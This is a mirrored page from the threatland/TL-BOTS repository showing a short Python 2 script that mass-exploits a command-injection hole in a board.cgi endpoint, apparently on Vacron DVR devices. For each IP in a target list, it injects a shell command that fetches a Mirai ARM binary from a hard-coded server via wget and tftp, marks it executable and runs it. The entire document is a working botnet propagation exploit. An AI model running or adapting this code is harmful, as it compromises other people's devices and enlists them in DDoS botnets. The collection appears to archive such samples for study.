mirror of
https://github.com/threatland/TL-BOTS
synced 2024-06-16 12:00:06 +00:00
31 lines
983 B
Python
31 lines
983 B
Python
#! python !#
|
|
import threading, random, socket, time, sys, requests, re, os
|
|
|
|
if len(sys.argv) < 3:
|
|
print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
|
|
sys.exit()
|
|
|
|
ip = "23.130.192.132" # IP for server with bins
|
|
vulns = open(sys.argv[1], "r").readlines()
|
|
port = int(sys.argv[2]) # ports 8080 80 81 8181
|
|
class send_payload(threading.Thread):
|
|
def __init__ (self, ip):
|
|
threading.Thread.__init__(self)
|
|
self.ip = str(ip).rstrip('\n')
|
|
def run(self):
|
|
try:
|
|
url = "http://" + self.ip + "/board.cgi?cmd=" "cd+/tmp;+wget+http://" + ip + "/33bi/mirai.arm7+-O+-+>+mirai.arm7;+chmod+777+mirai.arm7;+./mirai.arm7+vacron;+tftp+-g+-l+mirai.arm7+-r+mirai.arm7+" + ip + ";+chmod+777+mirai.arm7;+./mirai.arm7+vacron"
|
|
requests.get(url, timeout=8)
|
|
print "PAYLOAD SENT: %s"%(self.ip)
|
|
except:
|
|
pass
|
|
|
|
for IP in vulns:
|
|
try:
|
|
ip = "".join(IP)
|
|
ip = ip.replace("\n", "")
|
|
t = send_payload(ip)
|
|
t.start()
|
|
time.sleep(0.03)
|
|
except:
|
|
pass |